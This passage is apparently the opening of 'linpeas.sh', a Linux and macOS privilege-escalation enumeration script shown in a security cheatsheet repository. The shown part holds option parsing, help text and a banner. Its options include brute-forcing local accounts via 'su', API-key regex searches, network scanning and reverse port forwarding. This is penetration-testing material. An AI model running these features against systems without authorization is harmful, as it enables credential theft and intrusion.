daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

linpeas.sh (1144032B)


      1 #!/bin/sh
      2 VERSION="ng"
      3 ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission."
      4 ###########################################
      5 #-------) Checks pre-everything (---------#
      6 ###########################################
      7 if ([ -f /usr/bin/id ] && [ "$(/usr/bin/id -u)" -eq "0" ]) || [ "`whoami 2>/dev/null`" = "root" ]; then
      8   IAMROOT="1"
      9   MAXPATH_FIND_W="3"
     10 else
     11   IAMROOT=""
     12   MAXPATH_FIND_W="7"
     13 fi
     14 ###########################################
     15 #---------------) Colors (----------------#
     16 ###########################################
     17 C=$(printf '\033')
     18 RED="${C}[1;31m"
     19 SED_RED="${C}[1;31m&${C}[0m"
     20 GREEN="${C}[1;32m"
     21 SED_GREEN="${C}[1;32m&${C}[0m"
     22 YELLOW="${C}[1;33m"
     23 SED_YELLOW="${C}[1;33m&${C}[0m"
     24 RED_YELLOW="${C}[1;31;103m"
     25 SED_RED_YELLOW="${C}[1;31;103m&${C}[0m"
     26 BLUE="${C}[1;34m"
     27 SED_BLUE="${C}[1;34m&${C}[0m"
     28 ITALIC_BLUE="${C}[1;34m${C}[3m"
     29 LIGHT_MAGENTA="${C}[1;95m"
     30 SED_LIGHT_MAGENTA="${C}[1;95m&${C}[0m"
     31 LIGHT_CYAN="${C}[1;96m"
     32 SED_LIGHT_CYAN="${C}[1;96m&${C}[0m"
     33 LG="${C}[1;37m" #LightGray
     34 SED_LG="${C}[1;37m&${C}[0m"
     35 DG="${C}[1;90m" #DarkGray
     36 SED_DG="${C}[1;90m&${C}[0m"
     37 NC="${C}[0m"
     38 UNDERLINED="${C}[5m"
     39 ITALIC="${C}[3m"
     40 ###########################################
     41 #---------) Parsing parameters (----------#
     42 ###########################################
     43 # --) FAST - Do not check 1min of procceses and su brute
     44 # --) SUPERFAST - FAST & do not search for special filaes in all the folders
     45 if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi
     46 FAST="1" #By default stealth/fast mode
     47 SUPERFAST=""
     48 DISCOVERY=""
     49 PORTS=""
     50 QUIET=""
     51 CHECKS="system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex"
     52 MITRE_FILTER=""
     53 SEARCH_IN_FOLDER=""
     54 ROOT_FOLDER="/"
     55 WAIT=""
     56 PASSWORD=""
     57 NOCOLOR=""
     58 DEBUG=""
     59 AUTO_NETWORK_SCAN=""
     60 EXTRA_CHECKS=""
     61 REGEXES=""
     62 PORT_FORWARD=""
     63 NOT_CHECK_EXTERNAL_HOSTNAME=""
     64 ONLINE_VULN_CHECKS=""
     65 THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")"
     66 [ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #If THREADS is not a number, put number 2
     67 [ "$THREADS" -lt 1 ] 2>/dev/null && THREADS="2" #If THREADS is 0 or negative, put number 2 (avoids division-by-zero in eval_bckgrd)
     68 HELP=$GREEN"Enumerate and search Privilege Escalation vectors.
     69 ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors.
     70       ${GREEN}  Checks:
     71         ${YELLOW}    -a${BLUE} Perform all checks: 1 min of processes, su brute, and extra checks.
     72         ${YELLOW}    -o${BLUE} Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex). Select a comma separated list.
     73         ${YELLOW}    -T${BLUE} Only execute checks matching the specified MITRE ATT&CK technique(s).$DG Ex: -T T1057,T1082$BLUE
     74         ${YELLOW}    -s${BLUE} Stealth & faster (don't check some time consuming checks)
     75         ${YELLOW}    -e${BLUE} Perform extra enumeration
     76         ${YELLOW}    -r${BLUE} Enable Regexes (this can take from some mins to hours)
     77         ${YELLOW}    -V${BLUE} Send package/kernel inventory to HackTricks for online vulnerability lookup
     78         ${YELLOW}    -P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
     79         ${YELLOW}    -n${BLUE} Do not check hostname & IP in known malicious lists and leaks
     80 	${YELLOW}    -D${BLUE} Debug mode
     81       ${GREEN}  Network recon:
     82         ${YELLOW}    -t${BLUE} Automatic network scan - This option writes to files
     83 	${YELLOW}    -d <IP/NETMASK>${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24
     84         ${YELLOW}    -p <PORT(s)> -d <IP/NETMASK>${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139
     85         ${YELLOW}    -i <IP> [-p <PORT(s)>]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
     86         $GREEN     Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
     87       ${GREEN}  Port forwarding (reverse connection):
     88         ${YELLOW}    -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a your host (LOCAL_IP:LOCAL_PORT) to a remote IP (REMOTE_IP:REMOTE_PORT)
     89       ${GREEN}  Firmware recon:
     90         ${YELLOW}    -f </FOLDER/PATH>${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder
     91       ${GREEN}  Misc:
     92         ${YELLOW}    -h${BLUE} To show this message
     93 	${YELLOW}    -w${BLUE} Wait execution between big blocks of checks
     94         ${YELLOW}    -L${BLUE} Force linpeas execution
     95         ${YELLOW}    -M${BLUE} Force macpeas execution
     96 	${YELLOW}    -q${BLUE} Do not show banner
     97         ${YELLOW}    -N${BLUE} Do not use colours
     98         ${YELLOW}    -z <N>${BLUE} Set number of threads for background checks (default: auto-detected CPU count, fallback: 2; must be >= 1)$NC"
     99 while getopts ":h?asd:p:i:P:qo:T:LMwNDterVf:F:z:" opt; do
    100   case "$opt" in
    101     h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;;
    102     a)  FAST="";EXTRA_CHECKS="1";ONLINE_VULN_CHECKS="1";;
    103     s)  SUPERFAST=1;;
    104     d)  DISCOVERY=$OPTARG;;
    105     p)  PORTS=$OPTARG;;
    106     i)  IP=$OPTARG;;
    107     P)  PASSWORD=$OPTARG;;
    108     n)  NOT_CHECK_EXTERNAL_HOSTNAME="1";;
    109     q)  QUIET=1;;
    110     o)  CHECKS=$OPTARG;;
    111     T)  MITRE_FILTER=$OPTARG;;
    112     L)  MACPEAS="";;
    113     M)  MACPEAS="1";;
    114     w)  WAIT=1;;
    115     N)  NOCOLOR="1";;
    116     D)  DEBUG="1";;
    117     t)  AUTO_NETWORK_SCAN="1";;
    118     e)  EXTRA_CHECKS="1";;
    119     r)  REGEXES="1";;
    120     V)  ONLINE_VULN_CHECKS="1";;
    121     f)  SEARCH_IN_FOLDER=$OPTARG;
    122     	if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/"
    123         SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/";
    124       fi;
    125           ROOT_FOLDER=$SEARCH_IN_FOLDER;
    126       REGEXES="1";
    127 	    CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_perms_files,interesting_files,api_keys_regex";;
    128     F)  PORT_FORWARD=$OPTARG;;
    129     z)  if [ "$OPTARG" -eq "$OPTARG" ] 2>/dev/null && [ "$OPTARG" -ge 1 ] 2>/dev/null; then THREADS=$OPTARG; else echo "WARNING: -z requires an integer >= 1, ignoring." >&2; fi;;
    130     :)  echo "ERROR: -$OPTARG requires an argument (e.g. -T T1082,T1552)" >&2; printf "%s\n\n" "$HELP$NC"; exit 1;;
    131     *)  echo "ERROR: Unknown option -$OPTARG" >&2; printf "%s\n\n" "$HELP$NC"; exit 1;;
    132     esac
    133 done
    134 if [ "$MACPEAS" ]; then SCRIPTNAME="MacPEAS"; else SCRIPTNAME="LinPEAS"; fi
    135 if [ "$NOCOLOR" ]; then
    136   C=""
    137   RED=""
    138   SED_RED="&"
    139   GREEN=""
    140   SED_GREEN="&"
    141   YELLOW=""
    142   SED_YELLOW="&"
    143   SED_RED_YELLOW="&"
    144   BLUE=""
    145   SED_BLUE="&"
    146   ITALIC_BLUE=""
    147   LIGHT_MAGENTA=""
    148   SED_LIGHT_MAGENTA="&"
    149   LIGHT_CYAN=""
    150   SED_LIGHT_CYAN="&"
    151   LG=""
    152   SED_LG="&"
    153   DG=""
    154   SED_DG="&"
    155   NC=""
    156   UNDERLINED=""
    157   ITALIC=""
    158 fi
    159 # test if sed supports -E or -r
    160 E=E
    161 echo | sed -${E} 's/o/a/' 2>/dev/null
    162 if [ $? -ne 0 ] ; then
    163 	echo | sed -r 's/o/a/' 2>/dev/null
    164 	if [ $? -eq 0 ] ; then
    165 		E=r
    166 	else
    167 		echo "${YELLOW}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}"
    168 	fi
    169 fi
    170 # on macOS the built-in echo does not support -n, use /bin/echo instead
    171 if [ "$MACPEAS" ] ; then alias echo=/bin/echo ; fi
    172 print_title(){
    173   if [ "$DEBUG" ]; then
    174     END_T1_TIME=$(date +%s 2>/dev/null)
    175     if [ "$START_T1_TIME" ]; then
    176       TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME))
    177       printf $DG"This check took $TOTAL_T1_TIME seconds\n"$NC
    178     fi
    179     END_T1_TIME=$(date +%s 2>/dev/null)
    180     if [ "$START_T1_TIME" ]; then
    181       TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME))
    182       printf $DG"The total section execution took $TOTAL_T1_TIME seconds\n"$NC
    183       echo ""
    184     fi
    185     START_T1_TIME=$(date +%s 2>/dev/null)
    186   fi
    187   title=$1
    188   title_len=$(echo $title | wc -c)
    189   max_title_len=80
    190   rest_len=$((($max_title_len - $title_len) / 2))
    191   printf "%s" "${BLUE}"
    192   for i in $(seq 1 $rest_len); do printf " "; done
    193   printf "╔"
    194   for i in $(seq 1 $title_len); do printf "═"; done; printf "═";
    195   printf "╗"
    196   echo ""
    197   for i in $(seq 1 $rest_len); do printf "═"; done
    198   printf "╣ $GREEN${title}${BLUE} ╠"
    199   for i in $(seq 1 $rest_len); do printf "═"; done
    200   echo ""
    201   printf "%s" "${BLUE}"
    202   for i in $(seq 1 $rest_len); do printf " "; done
    203   printf "╚"
    204   for i in $(seq 1 $title_len); do printf "═"; done; printf "═";
    205   printf "╝"
    206   printf "%s" "${NC}"
    207   echo ""
    208 }
    209 check_mitre_filter(){
    210   # $1 = comma-separated MITRE technique IDs for this check (e.g. "T1082,T1548.003")
    211   # Returns 0 (run the check) when no filter is active OR when at least one ID matches.
    212   # Parent filters match child techniques (e.g. T1552 matches T1552.001),
    213   # but a child filter must not match a parent-only tag.
    214   # Uses pure parameter-expansion loops — no subprocess forks, POSIX-compliant.
    215   [ -z "$MITRE_FILTER" ] && return 0
    216   _mitre_tags_left="$1,"
    217   while [ -n "$_mitre_tags_left" ]; do
    218     _mitre_tag="${_mitre_tags_left%%,*}"
    219     _mitre_tags_left="${_mitre_tags_left#*,}"
    220     _mitre_base=${_mitre_tag%%.*}
    221     _mitre_filters_left="$MITRE_FILTER,"
    222     while [ -n "$_mitre_filters_left" ]; do
    223       _mitre_filter="${_mitre_filters_left%%,*}"
    224       _mitre_filters_left="${_mitre_filters_left#*,}"
    225       [ "$_mitre_filter" = "$_mitre_tag" ] && return 0
    226       [ "$_mitre_filter" = "$_mitre_base" ] && return 0
    227     done
    228   done
    229   return 1
    230 }
    231 print_2title(){
    232   if [ "$DEBUG" ]; then
    233     END_T2_TIME=$(date +%s 2>/dev/null)
    234     if [ "$START_T2_TIME" ]; then
    235       TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME))
    236       printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC
    237       echo ""
    238     fi
    239     START_T2_TIME=$(date +%s 2>/dev/null)
    240   fi
    241   if [ -n "$2" ]; then
    242     printf ${BLUE}"╔══════════╣ $GREEN$1 ${DG}($2)\n"$NC #There are 10 "═"
    243   else
    244     printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═"
    245   fi
    246 }
    247 print_3title(){
    248   if [ -n "$2" ]; then
    249     printf ${BLUE}"══╣ $GREEN$1 ${DG}($2)\n"$NC #There are 2 "═"
    250   else
    251     printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═"
    252   fi
    253 }
    254 print_3title_no_nl(){
    255   printf "\033[2K\r"
    256   printf ${BLUE}"══╣ $GREEN${1}..."$NC #There are 2 "═"
    257 }
    258 eval_bckgrd(){
    259   eval "$1" &
    260   CONT_THREADS=$(($CONT_THREADS+1)); if [ "$(($CONT_THREADS%$THREADS))" -eq "0" ]; then wait; fi
    261 }
    262 print_banner(){
    263   if [ "$MACPEAS" ]; then
    264     bash -c "printf '                         \e[38;5;238m▄\e[38;5;233m▄\e[38;5;235m▄\e[38;5;65m▄\e[48;5;239m\e[38;5;107m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;240m\e[38;5;65m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[38;5;233m▄\e[38;5;232m▄\e[38;5;239m▄\e[0m
    265                       \e[38;5;233m▄\e[38;5;246m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;71m    \e[38;5;65m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m        \e[48;5;65m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[0m
    266                   \e[38;5;245m▄\e[38;5;233m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;239m\e[38;5;71m▄\e[48;5;71m  \e[38;5;235m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;236m\e[38;5;64m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;234m\e[38;5;22m▄\e[48;5;65m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m       \e[48;5;237m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;238m▄\e[0m
    267                \e[38;5;239m▄\e[38;5;233m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;71m  \e[38;5;0m▄\e[48;5;236m\e[38;5;2m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m      \e[48;5;22m\e[38;5;76m▄\e[48;5;0m\e[38;5;76m▄\e[48;5;234m\e[38;5;64m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m       \e[48;5;234m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;233m▄\e[0m
    268             \e[38;5;233m▄\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;71m   \e[38;5;235m▄\e[48;5;65m\e[38;5;235m▄\e[48;5;0m\e[38;5;255m▄\e[48;5;22m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;242m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;254m\e[38;5;15m▄\e[48;5;15m         \e[38;5;255m▄\e[48;5;255m\e[38;5;234m▄\e[48;5;248m\e[38;5;251m▄\e[48;5;240m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;64m\e[38;5;15m▄\e[48;5;70m\e[38;5;251m▄\e[48;5;76m\e[38;5;8m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;64m\e[38;5;70m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;238m\e[38;5;2m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m        \e[48;5;237m\e[38;5;71m▄\e[0m
    269          \e[38;5;233m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[48;5;71m    \e[38;5;65m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;255m▄\e[48;5;15m             \e[38;5;233m▄\e[48;5;253m\e[38;5;0m▄\e[48;5;255m\e[38;5;232m▄\e[48;5;242m\e[38;5;238m▄\e[48;5;242m\e[38;5;233m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m      \e[48;5;255m\e[38;5;15m▄\e[48;5;145m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;22m\e[38;5;255m▄\e[48;5;70m\e[38;5;248m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;234m\e[38;5;233m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m      \e[0m
    270          \e[48;5;71m      \e[38;5;234m▄\e[48;5;233m\e[38;5;251m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m             \e[48;5;243m\e[38;5;235m▄\e[48;5;0m     \e[38;5;243m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;15m            \e[48;5;255m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;232m\e[38;5;15m▄\e[48;5;235m\e[38;5;145m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[0m
    271          \e[48;5;71m     \e[48;5;65m\e[38;5;232m▄\e[48;5;241m\e[38;5;15m▄\e[48;5;15m               \e[48;5;236m\e[38;5;245m▄\e[48;5;0m     \e[48;5;247m\e[38;5;232m▄\e[48;5;15m                  \e[48;5;247m\e[38;5;15m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[48;5;237m\e[38;5;236m▄\e[0m
    272          \e[48;5;71m   \e[38;5;238m▄\e[48;5;234m\e[38;5;243m▄\e[48;5;253m\e[38;5;15m▄\e[48;5;15m                 \e[48;5;0m\e[38;5;7m▄\e[48;5;0m\e[38;5;239m▄\e[48;5;0m\e[38;5;102m▄\e[48;5;0m\e[38;5;234m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;252m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m                  \e[48;5;239m\e[38;5;7m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[0m
    273          \e[48;5;71m  \e[38;5;236m▄\e[48;5;234m\e[38;5;250m▄\e[48;5;15m  \e[38;5;255m▄\e[48;5;15m\e[38;5;250m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;238m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;2m▄\e[48;5;255m\e[38;5;2m▄\e[48;5;255m\e[38;5;64m▄\e[48;5;254m\e[38;5;70m▄\e[48;5;188m\e[38;5;70m▄\e[48;5;253m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;64m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;251m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m                \e[48;5;255m\e[38;5;15m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;236m \e[0m
    274          \e[48;5;71m \e[38;5;233m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;238m\e[38;5;76m▄\e[48;5;65m\e[38;5;76m▄\e[48;5;236m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m                       \e[48;5;70m\e[38;5;76m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;240m\e[38;5;76m▄\e[48;5;145m\e[38;5;76m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;145m▄\e[48;5;15m\e[38;5;254m▄\e[48;5;15m        \e[48;5;242m\e[38;5;251m▄\e[48;5;236m\e[38;5;235m▄\e[0m
    275          \e[48;5;65m\e[38;5;232m▄\e[48;5;235m\e[38;5;64m▄\e[48;5;70m \e[48;5;76m                                     \e[48;5;2m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;242m\e[38;5;76m▄\e[48;5;254m\e[38;5;64m▄\e[48;5;15m\e[38;5;234m▄\e[48;5;15m\e[38;5;243m▄\e[48;5;15m\e[38;5;253m▄\e[48;5;15m  \e[48;5;255m\e[38;5;15m▄\e[48;5;233m \e[0m
    276          \e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m        \e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m                 \e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m       \e[48;5;28m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;102m\e[38;5;236m▄\e[48;5;250m\e[38;5;235m▄\e[48;5;233m\e[38;5;232m▄\e[0m
    277          \e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m       \e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m                  \e[48;5;22m\e[38;5;76m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;76m        \e[48;5;70m \e[48;5;236m \e[48;5;238m \e[48;5;236m\e[0m
    278          \e[48;5;232m\e[38;5;236m▄\e[48;5;236m\e[38;5;233m▄\e[48;5;64m \e[48;5;76m        \e[48;5;70m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m         \e[38;5;64m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m         \e[48;5;233m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m        \e[48;5;64m \e[48;5;236m \e[38;5;235m▄\e[0m
    279          \e[48;5;71m \e[48;5;232m\e[38;5;65m▄\e[48;5;64m\e[38;5;233m▄\e[48;5;76m          \e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m     \e[48;5;0m\e[38;5;70m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;70m▄\e[48;5;76m      \e[38;5;77m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m        \e[38;5;70m▄\e[48;5;236m \e[48;5;237m\e[38;5;238m▄\e[48;5;234m\e[38;5;235m▄\e[0m
    280          \e[48;5;71m  \e[48;5;235m\e[38;5;71m▄\e[48;5;64m\e[38;5;232m▄\e[48;5;76m        \e[48;5;77m\e[38;5;76m▄\e[48;5;107m\e[38;5;77m▄\e[48;5;107m  \e[38;5;77m▄\e[48;5;77m \e[48;5;76m               \e[48;5;107m\e[38;5;77m▄\e[48;5;107m   \e[48;5;71m\e[38;5;77m▄\e[48;5;76m        \e[48;5;64m \e[48;5;236m\e[38;5;237m▄\e[48;5;237m\e[38;5;234m▄\e[0m
    281          \e[48;5;71m    \e[48;5;232m\e[38;5;239m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m                                       \e[48;5;70m\e[38;5;64m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m
    282          \e[48;5;71m     \e[48;5;237m\e[38;5;71m▄\e[48;5;232m\e[38;5;235m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m                                    \e[48;5;70m\e[38;5;236m▄\e[48;5;236m \e[48;5;237m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m
    283          \e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m     \e[48;5;236m\e[38;5;71m▄\e[48;5;232m\e[38;5;65m▄\e[48;5;70m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m                              \e[38;5;22m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;70m\e[38;5;236m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m\e[38;5;233m▄\e[0m
    284            \e[38;5;233m▀\e[48;5;71m\e[38;5;232m▄\e[48;5;71m      \e[48;5;236m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;2m\e[38;5;235m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m                    \e[38;5;77m▄\e[48;5;76m\e[38;5;236m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;22m\e[38;5;238m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m         \e[0m
    285               \e[48;5;65m\e[38;5;238m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m       \e[48;5;235m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;238m▄\e[48;5;65m\e[38;5;234m▄\e[48;5;70m\e[38;5;232m▄\e[48;5;77m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;235m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m       